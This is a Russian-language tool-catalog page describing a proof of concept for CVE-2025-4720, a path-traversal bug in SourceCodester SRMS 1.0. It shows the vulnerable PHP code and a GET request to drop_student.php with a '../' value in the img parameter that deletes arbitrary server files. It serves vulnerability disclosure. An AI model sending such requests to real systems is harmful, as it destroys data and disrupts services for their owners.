Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
duplicate-CVE-2025-4720- — Доказательство концепции эксплуатации для CVE-2025-4720, уязвимости обхода пути в SourceCodester SRMS 1.0, позволяющей произвольное удаление файлов через конечную точку drop_student.php. | Kitploit
Инструменты/GitHubGitHub/xmyronn/duplicate-cve-2025-4720-
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubxmyronn/duplicate-cve-2025-4720-

duplicate-CVE-2025-4720-

Доказательство концепции эксплуатации для CVE-2025-4720, уязвимости обхода пути в SourceCodester SRMS 1.0, позволяющей произвольное удаление файлов через конечную точку drop_student.php.

Репозиторий
465 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

cve-srms-drop-student-path-traversal (CVE-2025-4720)(dupe)

Произвольное удаление файлов в SourceCodester SRMS 1.0

Описание

В конечной точке drop_student.php системы SourceCodester Student Result Management System (SRMS) 1.0 существует уязвимость обхода пути.

Приложение принимает управляемые пользователем данные из GET-параметра img и напрямую передаёт их в функцию unlink() без проверки, что позволяет удалять произвольные файлы на сервере.


Уязвимый код

root@kitploit:~
$img = $_GET['img'];

if ($img == "DEFAULT") {

} else {
    unlink('images/students/' . $img);
}

Тип уязвимости

  • CWE-22: Path Traversal
  • Воздействие: произвольное удаление файлов

Доказательство концепции (PoC)

  1. Создайте файл в корне приложения: Screenshot 2026-04-04 013454
root@kitploit:~
C:\xampp\htdocs\srms_0\srms\new_test.txt
  1. Отправьте следующий запрос: Screenshot 2026-04-04 013510
Screenshot 2026-04-04 013633
root@kitploit:~
GET /srms_0/srms/script/admin/core/drop_student.php?id=1&img=../../new_test.txt HTTP/1.1
Host: target
  1. Убедитесь, что файл удаляется с сервера. Screenshot 2026-04-04 013650

Воздействие

Злоумышленник может удалять произвольные файлы, доступные веб-серверу, включая:

  • Файлы конфигурации приложения
  • Логи
  • Загруженный контент

Это может привести к отказу в обслуживании или дальнейшей эксплуатации.


Дополнительные примечания

Данная уязвимость представляет собой отдельный вектор атаки по сравнению с ранее сообщёнными проблемами в SRMS, поскольку она:

  • Использует GET-запрос
  • Не требует загрузки файлов
  • Потенциально может быть использована через CSRF

Вендор

SourceCodester


Продукт

Student Result Management System (SRMS) https://www.sourcecodester.com/srms-makumbusho


Версия

1.0


Автор

Imad Alvi

Скачать инструмент